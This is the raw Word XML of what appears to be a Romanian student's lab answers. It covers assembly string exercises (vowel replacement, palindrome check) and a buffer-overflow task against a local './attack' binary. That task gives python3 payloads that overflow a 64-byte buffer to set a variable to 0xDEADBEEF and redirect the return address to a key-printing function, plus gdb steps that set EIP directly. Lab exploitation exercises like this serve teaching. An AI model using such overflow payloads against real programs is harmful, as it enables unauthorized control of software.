    <w:p w14:paraId="71C1FC56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9FA5705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53E92452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end_b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32233EE6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D30C09E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vowel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225A36AE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37C9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79F07D69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</w:p>
    <w:p w14:paraId="1A081AEF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737C9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end_b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00737C9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43FE0AFB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03F815F4" w14:textId="77777777" w:rsidR="00737C98" w:rsidRPr="00737C98" w:rsidRDefault="00737C98" w:rsidP="00737C9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37C9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37C9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2B4B5C92" w14:textId="77777777" w:rsidR="00737C98" w:rsidRDefault="00737C98" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DBFC8A3" w14:textId="473AE1F8" w:rsidR="00737C98" w:rsidRDefault="00737C98" w:rsidP="00E73B7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c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F68526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c: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Implementati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`void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replace_vowels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(char *s)` care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inlocuieste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toate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vocalele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din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sirul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primit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="635ECE7B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la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intrare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cu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caracterul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'X'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4724300E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-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va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modifica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sirul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intrare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="52546E17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-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sirul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intrare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este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compus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doar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din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litere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mici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ale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alfabetului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englezesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C103C81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5EDD3AA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C43AB6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replace_vowels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C43AB6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6FDE0070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32C3C72B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1BBC877A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AA61868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pusha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41031364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E0BB35A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      </w:t>
      </w:r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string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EC5D3D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3C1A2F6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26957AE1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strlen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F97D677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</w:p>
    <w:p w14:paraId="0F0B6D13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4641D36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   </w:t>
      </w:r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lungime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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sir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC17A02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   </w:t>
      </w:r>
      <w:r w:rsidRPr="00C43AB6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index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C726CF4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CCA9864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iterate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634526AB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6EE94F00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0788ADE3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bl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byte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21838CBF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EBB4677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018B1D39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0ECCCF4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277F7DCA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610988D2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5D2C358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419CE5C1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is_vowel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B26EE56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</w:p>
    <w:p w14:paraId="5F922F2F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6290508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6EB2A70C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56BF5877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5B1B6A9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0DB91451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jne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skip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104D0D45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7702B920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al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'X'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E84EF25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al</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD73549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skip:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3723F901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7A1459C6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C43AB6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79C50CE4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gramStart"/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loop</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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iterate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178C92B9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6E57B7B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out</w:t>
      </w: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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBEE0F9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31C96848" w14:textId="77777777" w:rsidR="00C43AB6" w:rsidRPr="00C43AB6" w:rsidRDefault="00C43AB6" w:rsidP="00C43AB6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C43AB6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C43AB6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247FDD07" w14:textId="77777777" w:rsidR="00C43AB6" w:rsidRDefault="00C43AB6" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699487FD" w14:textId="4FCC1FC5" w:rsidR="009242BA" w:rsidRDefault="009242BA" w:rsidP="00E73B7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d.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF36F0E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;TODO d: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Implementati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`int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is_palindrome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(char *s)` care ne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spune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daca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un sir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este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palindrom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sau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nu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F82E52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- un sir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este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palindrom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daca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citit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la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dreapta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la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stanga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sau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la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standa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la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dreapta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ramane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neschimbat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0915EF83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-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va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intoarce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1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daca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sirul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este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palindrom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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009242BA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0 in rest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29922166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242BA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is_palindrome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009242BA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6618115B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445EBEF4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01D069E4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37AFBBD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10184613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E450B2A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09CA0FF2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strlen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27D2678B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</w:p>
    <w:p w14:paraId="4DDB14EA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8BE318B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637F87D9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E8B6E51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3613F524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check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B02625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1EB41889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7E1DF0FE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DB34D70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42AEA39E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jge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palindrome </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C7CDBF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C2D0110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dl</w:t>
      </w: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byte</w:t>
      </w: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758E9322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bl</w:t>
      </w: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byte</w:t>
      </w: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 </w:t>
      </w:r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79AF74C3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B1F4EF4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5B24D90E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jne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not_palindrome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FA7D5F0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4C72896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776CD882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dec</w:t>
      </w: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25BAE126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check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5C3444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</w:p>
    <w:p w14:paraId="254DD6CB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635E52A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palindrome:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA557AB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7E212C09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end_d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59A34B35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889067F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242BA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not_palindrome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009242BA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6BCB1299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242BA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689556F7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4362469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242BA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end_d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009242BA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6C1FB273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170DCB9C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242BA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242BA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0748CD75" w14:textId="77777777" w:rsidR="009242BA" w:rsidRPr="009242BA" w:rsidRDefault="009242BA" w:rsidP="009242BA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F26F3EE" w14:textId="77777777" w:rsidR="009242BA" w:rsidRDefault="009242BA" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5107D19B" w14:textId="77777777" w:rsidR="00D67D15" w:rsidRDefault="00D67D15" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24960BFD" w14:textId="77777777" w:rsidR="00D67D15" w:rsidRDefault="00D67D15" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E20F4C" w14:textId="77777777" w:rsidR="00D67D15" w:rsidRDefault="00D67D15" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0168AA84" w14:textId="77777777" w:rsidR="00D67D15" w:rsidRPr="00737C98" w:rsidRDefault="00D67D15" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C780232" w14:textId="5520E578" w:rsidR="00737C98" w:rsidRPr="00B46619" w:rsidRDefault="00737C98" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD6783C" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r w:rsidRPr="00F140F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AD12452" wp14:editId="3BF5AB0A">
            <wp:extent cx="5943600" cy="2529205"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1943066924" name="Imagine 1" descr="O imagine care conține text, scrisoare, document, hârtie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66924" name="Imagine 1" descr="O imagine care conține text, scrisoare, document, hârtie&#10;&#10;Descriere generată automa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55DC" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1DBE60" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75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48BFBD5" wp14:editId="1948F977">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-244475</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1598930</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2216075" cy="1931035"/>
                <wp:effectExtent l="38100" t="38100" r="32385" b="50165"/>
                <wp:wrapNone/>
                <wp:docPr id="1795165672" name="Cerneală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216075" cy="1931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FCDCF" id="Cerneală 7" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:-19.75pt;margin-top:125.4pt;width:175.5pt;height:15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">
                <v:imagedata r:id="rId26" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00F140F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F9710F7" wp14:editId="1D2BFF81">
            <wp:extent cx="5029902" cy="2829320"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="956571518" name="Imagine 1" descr="O imagine care conține text, captură de ecran, afișaj, software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71518" name="Imagine 1" descr="O imagine care conține text, captură de ecran, afișaj, software&#10;&#10;Descriere generată automa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4077" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:pStyle w:val="Listparagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pP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folosim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r w:rsidRPr="00C31C1D">
        <w:t xml:space="preserve">python3 -c 'import sys; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>sys.stdout.buffer.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>b"A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>"*</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>+ b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>EF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>BE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>AD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>DE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C31C1D">
        <w:t>")' | ./attack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suprascrie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>variabila</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> local_8 cu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 care </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inseamna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 0xDEADBEEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443EFC08" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75"/>
    <w:p w14:paraId="3F57A0D7" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75"/>
    <w:p w14:paraId="109A7549" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619">
      <w:pPr>
        <w:pStyle w:val="Listparagraf"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5428DF36" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619">
      <w:pPr>
        <w:pStyle w:val="Listparagraf"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2EAA34" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619">
      <w:pPr>
        <w:pStyle w:val="Listparagraf"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC21B18" w14:textId="3F07ED7D" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:pStyle w:val="Listparagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (nu stim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>daca</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>corect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> %100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74962A07" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ./attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD7453B" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="008D6803">
        <w:t>b main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4087B77C" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3196DBBA" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="008D6803">
        <w:t>set $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6803">
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6803">
        <w:t xml:space="preserve"> = 0x08049236</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03783395" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="008D6803">
        <w:t>continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355F99C5" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="008D6803">
        <w:t xml:space="preserve"> 0x08049236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functiei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hull_breach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in care se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apeleaza</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>functia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   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>printarea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>celei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de 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chei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F9AEEB6" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:t xml:space="preserve">Deci </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de 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“the darkness”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C49548" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r w:rsidRPr="008D6803">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="246BAEE4" wp14:editId="52211C3F">
            <wp:extent cx="5943600" cy="2291080"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="391799560" name="Imagine 1" descr="O imagine care conține text, captură de ecran, Fon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99560" name="Imagine 1" descr="O imagine care conține text, captură de ecran, Font&#10;&#10;Descriere generată automat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CAD7" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75"/>
    <w:p w14:paraId="2A357239" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:t>Var 2: cu python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6BBF8F" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r w:rsidRPr="0062652E">
        <w:t xml:space="preserve">python3 -c 'import sys; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062652E">
        <w:t>sys.stdout.buffer.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062652E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062652E">
        <w:t>b"A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062652E">
        <w:t>" * 64 + b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062652E">
        <w:t>xef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062652E">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062652E">
        <w:t>xbe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062652E">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062652E">
        <w:t>xad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062652E">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062652E">
        <w:t>xde</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062652E">
        <w:t xml:space="preserve">" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062652E">
        <w:t>b"A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062652E">
        <w:t>" * 4 + b"\x36\x92\x04\x08")' | ./attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A0BC66" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Trebuie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>intrat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in if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return 0 In if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in afara e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>doar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exit1,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suprascrisa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de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>retur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adresa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> fc </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hull_breach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apeleaza</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>functie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gasi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> key2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB1D52D" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75"/>
    <w:p w14:paraId="004BFA04" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75"/>
    <w:p w14:paraId="7DC316AF" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75"/>
    <w:p w14:paraId="404A305C" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792E1A27" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75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B4583CD" wp14:editId="14DE28A4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1240790</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>400685</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1684750" cy="2790945"/>
                <wp:effectExtent l="38100" t="38100" r="48895" b="47625"/>
                <wp:wrapNone/>
                <wp:docPr id="733397563" name="Cerneală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684750" cy="2790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347CC" id="Cerneală 4" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:97.2pt;margin-top:31.05pt;width:133.6pt;height:220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">
                <v:imagedata r:id="rId30" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00F140F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29C9D4E6" wp14:editId="3EF953AC">
            <wp:extent cx="3627120" cy="1805972"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1261090199" name="Imagine 1" descr="O imagine care conține text, captură de ecran, afișaj, software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90199" name="Imagine 1" descr="O imagine care conține text, captură de ecran, afișaj, software&#10;&#10;Descriere generată automat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4358" cy="180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371C" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRDefault="00E73B75" w:rsidP="00E73B75">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Trb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apelat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>test.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>functia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parametru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sunt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cele</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> concatenate cu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>spatiu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ele</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E853192" w14:textId="77777777" w:rsidR="00E73B75" w:rsidRPr="00F140F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140F2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="72F1B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
